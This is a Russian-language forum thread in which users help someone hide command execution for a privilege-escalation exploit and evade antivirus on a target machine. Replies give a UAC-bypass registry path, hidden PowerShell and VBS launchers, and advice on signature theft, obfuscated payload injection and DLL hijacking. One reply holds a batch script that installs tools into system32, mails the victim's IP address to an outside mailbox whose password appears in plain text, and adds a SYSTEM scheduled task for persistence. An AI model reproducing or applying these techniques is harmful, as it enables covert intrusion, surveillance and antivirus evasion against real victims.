• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Вопрос о скрытии окна командной строки (Windows)

giloo

Member
18.07.2017
13
0
#1
Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!
 
09.01.2018
15
18
#3
Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API -
Для просмотра контента необходимо: Войти или зарегистрироваться
или
Для просмотра контента необходимо: Войти или зарегистрироваться
). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).
 

z3r0c10wn

Well-known member
04.09.2017
105
204
#4
Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!

powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe
 

giloo

Member
18.07.2017
13
0
#5
Всем спасибо большое за ответы)
Но к сожалению ни один из вариантов не подошел(
Можно попытаться приклеить подпись чужую к файлу https://github.com/secretsquirrel/SigThief
Подпись - это хорошо. Но чаще всего ав определяют доверие к файлу по базе хэш сумм. К примеру приложение было запущено 100 000 раз и без всякого подозрительного поведения, даже без подписи автоматически становились доверенными. Проверенная практика.
Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API -
Для просмотра контента необходимо: Войти или зарегистрироваться
или
Для просмотра контента необходимо: Войти или зарегистрироваться
). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).
Не подходит, вы предлагаете написать новое приложение, а это новая хэш сумма :3
powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe
Вылетает окошко powershell :( почти сразу исчезает, но жутко палевно(
 

giloo

Member
18.07.2017
13
0
#6
Eventvwr.exe запускает mmc в скрытном режиме через ветку реестра. Никто не знает, есть ли еще подобные приложения в Windows?
 

z3r0c10wn

Well-known member
04.09.2017
105
204
#8
Могу предложить такой вариант - создаем file.vbs

Код:
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "Programm.exe", 0
Set WShell = Nothing
Для запуска отдаем:
wscript ""path\to\your vbs file.vbs"
Код:
wscript "file.vbs"
в данном случае в VBS так же можно передать параметры
Код:
WShell.Run "Programm.exe /argument1 /argument2", 0
Последний параметр обязательно оставляем 0 - так как он и передает значение запуска в скрытом режиме.
 

giloo

Member
18.07.2017
13
0
#9
Как я уже писала, на целевой машине ав блокирует все скрипты и приложения с неизвестной сигнатурой. Я думаю копать в сторону dll hijack. Знает кто-нибудь доверенное приложение от майкрософт с возможностью hijack?
 

z3r0c10wn

Well-known member
04.09.2017
105
204
#10
Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.
 
Симпатии: Понравилось giloo

Valkiria

Red Team
05.01.2017
867
1 733
#11
Могу дополнить все предыдущие ответы своим вариантом.
Но прежде считаю необходимым обрисовать ситуацию.
Когда-то передо мной стояла задача контролировать изменения динамического IP адреса жертвы.
Сейчас для этого существует специальный софт, но не тогда ))
Я достигла желаемого результата при помощи консольных программ .
Выполнение консольных программ нужно было как-то скрыть, появление командной строки было недопустимо.
Для этого я воспользовалась программой cmdow.exe.
cmdow.exe - это консольная утилита Windows, которая позволяет скрывать командную строку при выполнении консольных программ.
Приведу пример использования утилиты из своего опыта.
Например, батник следующего содержания запустится без появления окна командной строки (содержимое не играет роли, важна только первая строка)
Код:
cmdow @ /HID
chcp 1251
md "%SYSTEMROOT%\system32\rm"
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
move /y "cmdow.exe" "%SYSTEMROOT%\system32\rm\cmdow.exe"
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
move /y "ip.bat" "%SYSTEMROOT%\system32\rm\ip.bat"
%SYSTEMROOT%\system32\blat.exe -install -server smtp.mail.ru 3 -port 25 -f 333tot@mail.ru -u 333tot@mail.ru -pw kd95757
wget -O - -q icanhazip.com > C:\11.txt
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to 333tot@mail.ru
del C:\11.txt
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f
Обрати внимание на первую строчку батника.
Код:
cmdow @ /HID
Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).
 
Последнее редактирование:

giloo

Member
18.07.2017
13
0
#12
Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.
В крепости проактивка :) А так спасибо большое за развернутый совет. Вот как раз таки ищу легальное ПО для инжектов.
Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).
Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)
 

Valkiria

Red Team
05.01.2017
867
1 733
#13
Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)
Действительно, результат сканирования просто поражает ))
Для просмотра контента необходимо: Войти или зарегистрироваться

В этом случае мы имеем дело с явлением, которое я описывала в этой статье ))
Пять лет назад антивирусы были безразличны к этой программе.
Времена меняются.
 

giloo

Member
18.07.2017
13
0
#14
Действительно, результат сканирования просто поражает ))
Я тоже в пала в удивление когда опробовала этот метод)

В общем... Нашла я метод, чуть кони не двинула пока реализовала его. В итоге как и говорила, решила hijackингом. Есть доверенная апа с подписью от винды, и ее злая длл :3
Всем спасибо большое за попытку помочь!))
Если кому нужно, могу скинуть(в личку) творение с исходным кодом. Хаппи Хак!)
 
Вверх Снизу